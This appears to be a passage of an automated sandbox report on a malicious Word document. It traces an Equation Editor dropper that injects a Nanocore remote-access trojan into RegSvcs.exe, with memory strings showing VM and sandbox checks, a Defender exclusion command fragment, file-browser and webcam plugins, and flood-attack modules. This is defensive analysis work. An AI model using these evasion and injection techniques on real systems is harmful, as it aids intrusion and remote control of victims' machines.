Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2860, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Window / User API: foregroundWindowGot 400
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Window / User API: foregroundWindowGot 510

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2440	Thread sleep time: -360000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2808	Thread sleep time: -102600s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 3052	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Code function: 9_2_003D0BB6 GetSystemInfo,

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 102600
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Thread delayed: delay time: 922337203685477

Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Source: C:\Users\Public\vbc.exe

Process token adjusted: Debug

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Show sources

Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 420000
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 422000
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 7EFDE008

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Source: RegSvcs.exe, 00000009.00000002.2388594675.0000000000830000.00000004.00000020.sdmp	Binary or memory string: Program Manageranalysis [Compatibility Mode] - Microsoft Wordp
Source: RegSvcs.exe, 00000009.00000002.2388585399.000000000081F000.00000004.00000020.sdmp	Binary or memory string: Program ManagerDi
Source: RegSvcs.exe, 00000009.00000002.2389375422.0000000002844000.00000004.00000001.sdmp	Binary or memory string: Program ManagerH
Source: RegSvcs.exe, 00000009.00000002.2389375422.0000000002844000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000009.00000002.2388770892.0000000000D50000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 00000009.00000002.2388770892.0000000000D50000.00000002.00000001.sdmp	Binary or memory string: !Progman
Source: RegSvcs.exe, 00000009.00000002.2388594675.0000000000830000.00000004.00000020.sdmp	Binary or memory string: Program Managerknown.
Source: RegSvcs.exe, 00000009.00000002.2389430858.00000000028D2000.00000004.00000001.sdmp	Binary or memory string: Program Manager`
Source: RegSvcs.exe, 00000009.00000002.2389430858.00000000028D2000.00000004.00000001.sdmp	Binary or memory string: Program ManagerDb
Source: RegSvcs.exe, 00000009.00000002.2389375422.0000000002844000.00000004.00000001.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2988, type: MEMORY
Source: Yara match	File source: 9.2.RegSvcs.exe.3830f84.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.9a0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.3b30110.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.9a0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.9a4629.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.3b30110.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3824d52.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.381ff26.25.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: RegSvcs.exe, 00000009.00000002.2388935709.0000000002280000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningF